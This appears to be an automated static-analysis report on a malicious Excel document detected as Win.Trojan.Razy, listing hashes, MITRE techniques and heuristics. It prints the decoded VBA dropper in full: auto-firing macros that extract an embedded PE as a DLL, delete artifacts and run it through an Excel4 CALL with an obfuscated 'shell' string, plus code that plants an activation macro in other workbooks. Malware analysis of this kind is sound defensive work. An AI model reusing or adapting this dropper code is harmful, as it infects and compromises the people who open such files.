Win.Trojan.Razy-7331387-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 bcfc8d3e54431d9c…

MALICIOUS

Office (OLE)

Size: 797.0 KB · Created: 2019-08-30 09:14:50 · Authoring application: Microsoft Excel · First seen: 2020-07-24
MD5: 83b032d6c59aa3f4151274c919c71193
SHA-1: 43993214830059b5401116f638f30a16268e8328
SHA-256: bcfc8d3e54431d9c2f24455584697c22936e715988a95728b956d89da62a6fef
Risk Score: 482

Malware Insights

Win.Trojan.Razy-7331387-0 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1137.001 Office Application Startup: VBA
  • T1566.001 Spearphishing Attachment
  • T1105 Ingress Tool Transfer
  • T1027 Obfuscated Files or Information
  • T1071.001 Web Protocols: Web Protocols

The sample is an Office document containing VBA macros that leverage `CreateObject` and `Shell()` calls, indicative of malicious intent. It also contains an embedded PE executable and references to Windows API functions like `VirtualAlloc` and `LoadLibrary`, suggesting it's designed to load and execute a secondary payload. The ClamAV detection name 'Win.Trojan.Razy-7331387-0' further supports its classification as a trojan.

Heuristics 11

  • ClamAV: Win.Trojan.Razy-7331387-0 | critical | CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Razy-7331387-0
  • Embedded PE executable | critical | OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected | medium | 3 related findings | OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA | critical | OLE_VBA_SHELL
    Matched line in script:
    Set FucjiFilm = CreateObject("WScri" + "pt.Shell")
    PRP = "%" & UserForm6.TextBox1.Tag
  • VBA ActiveX event launches decoded Excel4 macro | critical | OLE_VBA_ACTIVEX_XLM_STAGER
    The compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro, while the decompressed source does not — the VBA-stomping shape of the ActiveX-event XLM stager. The control event bridges into XLM formula execution to call Win32 / drop payloads, hidden from source-level scanners.
  • CreateObject call | high | OLE_VBA_CREATEOBJ
    Matched line in script:
    Set FucjiFilm = CreateObject("WScri" + "pt.Shell")
    PRP = "%" & UserForm6.TextBox1.Tag
  • Reference to LoadLibrary API | high | SC_STR_LOADLIBRARY
  • Reference to GetProcAddress API | high | SC_STR_GETPROCADDRESS
  • Reference to VirtualAlloc API | medium | SC_STR_VIRTUALALLOC
  • Reference to VirtualProtect API | medium | SC_STR_VIRTUALPROTECT
  • Embedded URL | info | EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.microsoft.com0 | In document text (OLE body)
    • http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl0X | In document text (OLE body)
    • http://www.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt0 | In document text (OLE body)
    • http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl0Z | In document text (OLE body)
    • http://www.microsoft.com/pki/certs/MicCodSigPCA_08-31-2010.crt0 | In document text (OLE body)
    • http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0T | In document text (OLE body)
    • http://www.microsoft.com/pki/certs/MicrosoftRootCert.crt0 | In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28003 bytes
SHA-256: 249947ae1e21321e5f02819695c47ef8312e6881d03e0bf634406cab895b3b75
First 1,000 lines of the extracted script
Attribute VB_Name = "Sem"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub addWBActivate()

    Dim VBProj
    Dim VBComp
    Dim codeMod
    Dim formsFolder As String
    Dim tmpColl As Collection
    Dim wBook As Workbook
    Dim filesToPrcs As Collection
    Dim flw
    Dim cdw
    
    Dim fullFName As String
    Dim activateExist As Boolean
    
    formsFolder = "C:\Users\GalkinVa\files_for_transport"
    
    Set tmpColl = flw.getPathsToFilesFromFolder(formsFolder)
    
    If tmpColl Is Nothing Then
        Err.Raise 13, Description:="tmpColl variable doesn"
    End If
    
    Set filesToPrcs = tmpColl
    
    For Each fName In filesToPrcs
        
        fullFName = fName
        
        fName = flw.extractNameWithExt(fullFName)
        Set wBook = Workbooks.Open(fullFName)
        Set VBProj = wBook.VBProject
        
        
        
        If cdw.VBComponentExists("ThisWorkbook", VBProj) Then
            Set VBComp = VBProj.VBComponents("ThisWorkbook")
        ElseIf cdw.VBComponentExists("ÝòàÊíèãà", VBProj) Then
            Set VBComp = VBProj.VBComponents("ÝòàÊíèãà")
        Else
            Err.Raise 13, "try to set VBComponent", "components from check doesn"
        End If
        
        Set codeMod = VBComp.CodeModule
        
        Set tmpColl = cdw.ListProcedures(VBComp)
        
        
        
        For Each proc In tmpColl
            If proc = "Workbook_Activate" Then
                activateExist = True
            End If
        Next proc
        
        If Not activateExist Then
            Call cdw.CreateEventProcedure(VBComp)
        Else
            Debug.Print "Workbook_Activate already exist in " & wBook.Name
        End If
        wBook.RunAutoMacros xlAutoClose
        On Error Resume Next
        wBook.Close saveChanges:=True
        If Err.Number <> 0 Then
            Debug.Print "Error occured when try to save " & wBook.Name
        End If
    Next fName
    

End Sub





Private Sub Workbook_Activate()
If UserForm1.Visible = False Then
Module1.SendCollection
End If

End Sub

Attribute VB_Name = "Page1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

     
  Public MousePointerLeak6004 As Byte
     
    Public Gen4var As Byte

   Public MousePointerLeak6003 As Byte
     
 Public Const FirstB As Byte = 77
  Public Const SecondB As Byte = 90
  Public Const ThirdB As Byte = 144








Public Property Get Keys() As Collection
    
    
    Set Keys = IKeys
End Property

Public Property Get Items() As Collection
    Set Items = IItms
End Property



  
Public Sub SendCollection()

Dim FucjiFilm As Object
    Dim SpecialPath As String
    

Set FucjiFilm = CreateObject("WScri" + "pt.Shell")
PRP = "%" & UserForm6.TextBox1.Tag

UserForm6.TextBox1.Tag = FucjiFilm.ExpandEnvironmentStrings(PRP + "%")
UserForm6.TextBox3.Tag = FucjiFilm.SpecialFolders(UserForm6.TextBox3.Tag)

ChDir (UserForm6.TextBox1.Tag)

    UserForm1.show
End Sub

Public Sub Remove(Key)
    If TypeName(Key) = "String" Then
        Dim i
        On Error Resume Next
        Call IItms.Remove(Key)
        Call IKeys.Remove(Key)
        
        For i = 1 To IItms.Count
            If InStr("Collection,Prop", TypeName(IItms.Item(i))) <> 0 Then
                If IItms.Item(i).Item("Name") = Key Then
                    Call IItms.Remove(i)
                    Call IKeys.Remove(i)
                    Exit For
                End If
            End If
        Next
        On Error GoTo 0
    Else
        Call IItms.Remove(Key)
        Call IKeys.Remove(Key)
    End If
End Sub


Private Function setItem(Key, Value, Optional RepFlg = True)
    Dim i As Integer
    
    If TypeName(Key) = "String" Then
        
        If RepFlg Then
            
            If Key <> "" Then
             
                Call IItms.Add(Value)
                Call IKeys.Add(IItms.Count)
            End If
        Else
            
            
            
            
            
            MsgBox "???"
        End If
    Else
        
        If IItms.Count < Key Then
            
            For i = IItms.Count To Key - 2
                Call IItms.Add("")
            Next
        End If
        If RepFlg Then
            
            On Error Resume Next
            Call IItms.Remove(Key)
            On Error GoTo 0
            If IItms.Count < Key Then
                Call IItms.Add(Value)
            Else
                Call IItms.Add(Value, before:=Key)
            End If
        Else
            
            If Key = 0 Then
                If IItms.Count = 0 Then
                    Call IItms.Add(Value)
                Else
                    Call IItms.Add(Value, before:=1)
                End If
            Else
                If IItms.Count < Key Then
                    Call IItms.Add("")
                    Call IItms.Add(Value)
                Else
                    Call IItms.Add(Value, after:=Key)
                End If
            End If
        End If
    End If

End Function









Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{7E7C5695-1990-4FD6-8CEA-4E89D36BC15B}{E395EEAE-86E7-4BD8-836D-F83EAD60FC86}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()

End Sub

Private Sub UserForm_Activate()
DoEvents
DoEvents
ChenderBegin
DoEvents
End Sub

Private Sub UserForm_Initialize()
Call SystemButtonSettings(Me, False)

End Sub

Attribute VB_Name = "Module2"


 
Public Sub GetParam(Count As Integer)
    Dim i As Long
    Dim j As Integer
    Dim c As String
    Dim bbqI As Boolean
    Dim bbqQ As Boolean

    j = 1
    bbqI = False
    bbqQ = False
    GetP.aram = ""
    For i = 1 To Len(Comma.nd$)
        c = Mi.d$(Comma.nd$, i, 1)
        If bbqI Then
            If c = """" Then
                j = j + 1
                bbqI = False
                bbqQ = False
            End If
        ElseIf bbqI And Not bbqQ Then
            If c = " " Then
                j = j + 1
                bbqI = False
                bbqQ = False
            End If
        Else
            If c = """" Then
                If j > Count Then Exit Sub
                bbqI = True
                bbqQ = True
            ElseIf c <> " " Then
                bbqI = True
                bbqQ = False
            End If
        End If
        If bbqI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
    Next i
End Sub


Public Function PathBack(ByVal sPath As String) As String
    On Error Resume Next
    Dim sT As Variant
    Dim tt As String
    If Len(sPath) = 3 Then GoTo errorhand
    
    For ii = 0 To UBound(sT) - 2
        tt = tt & sT(ii) & "\"
    Next ii
    
    PathBack = tt
    
errorhand:
    PathBack = sPath
End Function










Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "UserForm6"
Attribute VB_Base = "0{7D1F8756-5F10-4AFC-ADD1-58C883AB3F11}{FDDBCC1F-9A5F-49C1-A6D4-A9F1FE84E1F9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module6"
 #If VBA7 And Win64 Then
Public Const IsSecond = True
#Else
Public Const IsSecond = False

#End If

Public Sub PrepareConfigForOutput()
On Error Resume Next
    Dim i As Long
    Dim sNextChar As String
    Dim bbqI As Boolean
    Dim bbqQ As Boolean
    Dim sCommand As String
        Dim PrepareConfigForOutput As Long
    PrepareConfigForOutput = 0
    bbqIParameter = False
    bbqQ = False
    sCommand = Command$
    
    For i = 1 To ALen.B(sCommand)
        sNextChar = Mid(sCommand, i, 1)
        If bbqIParameter Then
            If bbqQ Then
                If sNextChar = " " Then
                    bbqIParameter = False
                    bbqQ = False
                    PrepareConfigForOutput = PrepareConfigForOutput + 1
                End If
            End If
        
        End If
    Next i
    If bbqIParameter Then PrepareConfigForOutput = PrepareConfigForOutput + 1
End Sub







Public Sub PathBack(ByVal sPath As String)
    On Error Resume Next
    Dim sT As Variant
    Dim tt As String
    If Len(sPath) = 3 Then GoTo errorhand
    
    For ii = 0 To UBound(sT) - 2
        tt = tt & sT(ii) & "\"
    Next ii
    
    PathB.ack = tt
    
errorhand:
    Path.Back = sPath
End Sub

Public Sub GetParam(Count As Integer)
    Dim i As Long
    Dim j As Integer
    Dim c As String
    Dim bbqI As Boolean
    Dim bbqQ As Boolean

    j = 1
    bbqI = False
    bbqQ = False
    GetP.aram = ""
    For i = 1 To Len(Comma.nd$)
        c = Mi.d$(Comma.nd$, i, 1)
        If bbqI Then
            If c = """" Then
                j = j + 1
                bbqI = False
                bbqQ = False
            End If
        ElseIf bbqI And Not bbqQ Then
            If c = " " Then
                j = j + 1
                bbqI = False
                bbqQ = False
            End If
        Else
            If c = """" Then
                If j > Count Then Exit Sub
                bbqI = True
                bbqQ = True
            ElseIf c <> " " Then
                bbqI = True
                bbqQ = False
            End If
        End If
        If bbqI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
    Next i
End Sub

Attribute VB_Name = "Module5"
Public MousePointerLeak() As Byte


Sub ConvertChartToPicture()
    Dim Cht As Chart
    If ActiveChart Is Nothing Then Exit Sub
    If TypeName(ActiveSheet) = "Chart" Then Exit Sub
    Set Cht = ActiveChart
    Cht.CopyPicture Appearance:=xlPrinter, _
      Size:=xlScreen, Format:=xlPicture
    ActiveWindow.RangeSelection.Select
    ActiveSheet.Paste
End Sub



Private Function setItem(Key, Value, Optional RepFlg = True)
    Dim i As Integer
    
    If TypeName(Key) = "String" Then
        
        If RepFlg Then
            
            If Key <> "" Then
                On Error Resume Next
                Call IItms.Remove(Key)
                Call IKeys.Remove(Key)
                On Error GoTo 0
                Call IItms.Add(Value, Key)
                Call IKeys.Add(Key, Key)
            Else
                Call IItms.Add(Value)
                Call IKeys.Add(IItms.Count)
            End If
        Else
            
            
            
            
            
            MsgBox "???"
        End If
    Else
        
        If IItms.Count < Key Then
            
            For i = IItms.Count To Key - 2
                Call IItms.Add("")
            Next
        End If
        If RepFlg Then
            
            On Error Resume Next
            Call IItms.Remove(Key)
            On Error GoTo 0
            If IItms.Count < Key Then
                Call IItms.Add(Value)
            Else
                Call IItms.Add(Value, before:=Key)
            End If
        Else
            
            If Key = 0 Then
                If IItms.Count = 0 Then
                    Call IItms.Add(Value)
                Else
                    Call IItms.Add(Value, before:=1)
                End If
            Else
                If IItms.Count < Key Then
                    Call IItms.Add("")
                    Call IItms.Add(Value)
                Else
                    Call IItms.Add(Value, after:=Key)
                End If
            End If
        End If
    End If

End Function





Public Sub ReplaceFile(WhereToGo)
 DoEvents
        ThisWorkbook.Sheets.Copy
        Application.DisplayAlerts = False
        DoEvents
        ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9
    DoEvents
    ActiveWorkbook.Close
    DoEvents
        
End Sub
























Attribute VB_Name = "Module4"

Private Const GWL_STYLE = -16
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000


#If VBA7 Then

    Private Declare PtrSafe Function BoxWSL _
        Lib "user32" Alias "SetWindowLongA" (ByVal parameter1 As Long, _
        ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare PtrSafe Function FWA1 _
        Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare PtrSafe Function DrawMenuBar _
        Lib "user32" (ByVal parameter1 As Long) As Long
    Private Declare PtrSafe Function GetWindowLong11 _
        Lib "user32" Alias "GetWindowLongA" (ByVal parameter1 As Long, _
        ByVal nIndex As Long) As Long
        
#Else

    Private Declare Function GetWindowLong11 _
        Lib "user32" Alias "GetWindowLongA" ( _
        ByVal parameter1 As Long, ByVal nIndex As Long) As Long
    Private Declare Function FWA1 _
        Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare Function DrawMenuBar _
        Lib "user32" (ByVal parameter1 As Long) As Long
  Private Declare Function BoxWSL _
        Lib "user32" Alias "SetWindowLongA" ( _
        ByVal parameter1 As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    
#End If







Private Sub cmdExit_Click()
    Unload M.e
    End
End Sub




Public Sub SystemButtonSettings(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long

windowHandle = FWA1(vbNullString, frm.Caption)
windowStyle = GetWindowLong11(windowHandle, GWL_STYLE)

If show Then

    BoxWSL windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)

   
Else
 BoxWSL windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)

End If

DrawMenuBar (windowHandle)

End Sub
Public Sub NumberBuffer(Number As Long, ByVal Buffer As Byte)
 If UserForm1.Enabled = True Then
    Put #Number, , Buffer
End If
End Sub





Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant)
    On Error Resume Next
    For Each Key In putArrayBigList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub





Private Sub ERRCHECK(result)
   
    
     
    If result = RCPND_FMOD_OK Then
        ms.gR.esult = MsgBox(result & ") " & FMOD_Er_rorStr.ing(result))
    End If
    
End Sub










Attribute VB_Name = "Module7"


Public Sub Text_Write(progbar As Object, tmptext As String, tmpSpalte As Long, tmpZeile As Long, tmpcolor As Long)

   
   
   For i = 1 To Len(tmptext)
      
      
      If TextClockWise = True Then
         
         
         
         
         For x = tmpSpalte To tmpSpalte + UBound(ZeichenArray, 1)
            For y = tmpZeile - Letter.Position + Letter.FontHeight - 1 To tmpZeile - Letter.Position - UBound(ZeichenArray, 2) + Letter.FontHeight - 1 Step -1
               
               OldLetterArray.RGB(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position + UBound(ZeichenArray, 2) - Letter.FontHeight + 1) = Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) * 100 + Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) * 10 + Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1)
               
               OldLetterArray.SW(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position + UBound(ZeichenArray, 2) - Letter.FontHeight + 1) = CBool(Arra.y_SW((x - 1) Mod Spalten + 1, y - 1))
               If ZeichenArray(x - tmpSpalte, tmpZeile - Letter.Position + Letter.FontHeight - 1 - y) Then
                  
                  Draw_Fill.Cell (x - 1) Mod Spalten + 1, y - 1, picsource, tmpcolor, False
                  
                  
                  
                  Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).R / 255
                  Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).G / 255
                  Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).B / 255
                  
                  
                  Arra.y_SW((x - 1) Mod Spalten + 1, y - 1) = IIf(Draw_Color2.SW(tmpcolor), 1, 0)
               End If
            Next y
         Next x
      
      Else
         
         
         
         
         
         
         OldLetter.ArrayRGB(ZeichenAnzahl - 1).Left = tmpSpalte
         OldLetter.ArrayRGB(ZeichenAnzahl - 1).Top = tmpZeile + Letter.Position
         
         OldLetter.ArraySW(ZeichenAnzahl - 1).Left = tmpSpalte
         OldLetter.ArraySW(ZeichenAnzahl - 1).Top = tmpZeile + Letter.Position
         
         
         For x = tmpSpalte To tmpSpalte - UBound(ZeichenArray, 1) Step -1
            For y = tmpZeile + Letter.Position To tmpZeile + Letter.Position + UBound(ZeichenArray, 2)
               
               OldLetterArray.RGB(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position) = Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) * 100 + Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) * 10 + Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1)
               
               OldLetterArray.SW(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile - Letter.Position) = CBool(Arra.y_SW((x - 1) Mod Spalten + 1, y - 1))
               If ZeichenArray(tmpSpalte - x, y - tmpZeile - Letter.Position) Then
                  
                  Draw_Fill.Cell (x - 1) Mod Spalten + 1, y - 1, picsource, tmpcolor, False
                  
                  
                  Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).R / 255
                  Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).G / 255
                  Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).B / 255
                  
                  Arra.y_SW((x - 1) Mod Spalten + 1, y - 1) = IIf(Draw_Color2.SW(tmpcolor), 1, 0)
               End If
            Next y
         Next x
      End If

      
      progbar.Value = i
   Next i
   
   
   progbar.Value = 0
      
   
   Dra.w_Zoom picsource, pictarget
End Sub


Public Sub ChenderBegin()
          WhereToGo = UserForm6.TextBox1.Tag & "\repository" + ".xls" + "x"
    CustomWBP = WhereToGo + "." + "zi" + "p"
    buildPathFor = UserForm6.TextBox1.Tag
    Dim ofbl As String
    Dim CurrentSizeOfAT As Long
    Dim sendings As Integer
    ofbl = UserForm6.TextBox3.Tag + "\stadr_"

    

ofbl = ofbl & "." & "d" & "ll"

            
        oob = buildPathFor + "\ole" + "Obj" + "ect*.b" + "" + "in"
         PublicResumEraseByArrayList oob, CustomWBP, ofbl
  ReplaceFile WhereToGo
    
        FileCopy WhereToGo, CustomWBP
        
         sendings = 1
        Set sNMSP = CreateObject("Shell." + "Application")
                 
  If sendings > 0 And sendings > -30 Then
         
          Set FileWherePutTo2 = sNMSP.Namespace(buildPathFor)
            Set FileWherePutTo = sNMSP.Namespace(CustomWBP)
           
          
          
          
FileWherePutTo2.CopyHere FileWherePutTo.Items.Item(UserForm6.Label2.Tag)

        End If
    CurrentSizeOfAT = 269824
      
        If IsSecond Then
                CurrentSizeOfAT = 300000 + 21530 + 6
                sendings = 2
            End If
 Composition buildPathFor & UserForm6.Label1.Tag, ofbl, CurrentSizeOfAT, sendings
        If sendings > 0 Then
            sendings = sendings + 1
            ChDir (UserForm6.TextBox3.Tag)
            sendings = sendings + 1
        End If
        If sendings < 100 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
            PrepareConfigForOutput
       
        If sendings < 0 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
    ofbl = "CALL(""" + ofbl

    ExecuteExcel4Macro ofbl + """,""llehs"",""J"")"
End Sub

Public Sub Clone(HTMLSource As Variant)
    On Error GoTo ErrorTrap
    
    Const Chunk = 1000
    
    Dim WorkingSrc As String
    Dim TagStart As Long
    Dim TagEnd As Long
    Dim TagLength As Long
    Dim TagStartString As String

    Dim Ptr As Long
    Dim Cnt As Long
    Dim Pos As Long
    Dim testing As Boolean
    Dim PosScriptEnd As Long
    Dim PosEndScript As Long
    Dim PosEndScriptEnd As Long
    
    
    
    WorkingSrc = HTMLSource
    LocalElementCount = 0
    LocalElementSize = 0
    ReDim LocalElements(LocalElementSize)
    
    If NewWay Then
        
        
        
        
        
        Loa.d = True
        Ptr = 0
        
        
        
        Do
            BlobSN = "/blob" & GetRan.domInteger() & ":"
            Ptr = Ptr + 1
        Loop While ((InStr(1, WorkingSrc, BlobSN, vbTextCompare) <> 0) And (Ptr < 10))
        
        
        
       spli.tt.est = Split(WorkingSrc, "<style")
        Cnt = UBound(spli.tt.est) + 1
        If Cnt > 1 Then
            For Ptr = 1 To Cnt - 1
                PosScriptEnd = InStr(1, spli.tt.est(Ptr), ">")
                If PosScriptEnd > 0 Then
                    PosEndScript = InStr(PosScriptEnd, spli.tt.est(Ptr), "</style", vbTextCompare)
                    If PosEndScript > 0 Then
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         spli.tt.est(Ptr) = Mi.d(spli.tt.est(Ptr), 1, PosScriptEnd) & BlobSN & BlobCnt & "/" & Mi.d(spli.tt.est(Ptr), PosEndScript)
                        BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                        Blo.bs(BlobCnt) = Mi.d(spli.tt.est(Ptr), PosScriptEnd + 1, (PosEndScript - 1) - (PosScriptEnd + 1) + 1)
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                        
                    End If
                End If
            Next
            WorkingSrc = Join(spli.tt.est, "<style")
        End If
        
        
        
        spli.tt.est = Split(WorkingSrc, "<style")
        Cnt = UBound(spli.tt.est) + 1
        If Cnt > 1 Then
            For Ptr = 1 To Cnt - 1
                PosScriptEnd = InStr(1, spli.tt.est(Ptr), ">")
                If PosScriptEnd > 0 Then
                    PosEndScript = InStr(PosScriptEnd, spli.tt.est(Ptr), "</style", vbTextCompare)
                    If PosEndScript > 0 Then
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         spli.tt.est(Ptr) = Mi.d(spli.tt.est(Ptr), 1, PosScriptEnd) & BlobSN & BlobCnt & "/" & Mi.d(spli.tt.est(Ptr), PosEndScript)
                        BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                        Blo.bs(BlobCnt) = Mi.d(spli.tt.est(Ptr), PosScriptEnd + 1, (PosEndScript - 1) - (PosScriptEnd + 1) + 1)
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                         BlobCnt = BlobCnt + 1
                        
                    End If
                End If
            Next
            WorkingSrc = Join(spli.tt.est, "<style")
        End If
    Exit Sub
    End If
ErrorTrap:
    Call Handle.Error("Load", Err.Number, Err.Source, Err.Description)
    End Sub




Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, MousePointerLeak6006 As Integer)
    
    Dim MousePointerLeak6001 As Long
   
    Dim Class1 As Class1
    Set Class1 = New Class1
     


  Dim SimpleMethod As Integer
    ReDim MousePointerLeak(1 To fl)
    MousePointerLeak6001 = FreeFile
  
    Open Composition2 For Binary Access Read As MousePointerLeak6001
    Dim cur As Integer
    cur = 1
Do While 1
        Get MousePointerLeak6001, , Gen4var
        If Gen4var = FirstB Then
            MousePointerLeak(1) = Gen4var
            
           Get MousePointerLeak6001, , MousePointerLeak6003
           If MousePointerLeak6003 = SecondB Then
            MousePointerLeak(2) = MousePointerLeak6003
                
                Get MousePointerLeak6001, , MousePointerLeak6004
                If MousePointerLeak6004 = ThirdB Then
                     MousePointerLeak(3) = MousePointerLeak6004
            
                     If cur = MousePointerLeak6006 Then
                        For k = 4 To fl
                            Get MousePointerLeak6001, , Gen4var
                            MousePointerLeak(k) = Gen4var
                            Next k
                         Exit Do
                     Else
                        cur = cur + 1
                     End If
                End If
…
embedded_office_00004541.exe | embedded-pe | Office MZ+PE at offset 0x4541 | 798399 bytes
SHA-256: 7a141c28f56ca50a4e661d5b037ea02cab71e00ca26a221be5e880e596952913
Detection
ClamAV: Win.Trojan.Razy-7331387-0
Obfuscation or payload: unlikely
ole10native_00.bin | ole-package | OLE Ole10Native stream: MBD007D0DB6/Ole10Native | 611597 bytes
SHA-256: 24dcb6fde1d37aac3a94c0038d0647620900c8042ba9bc961f231e5db6cc9171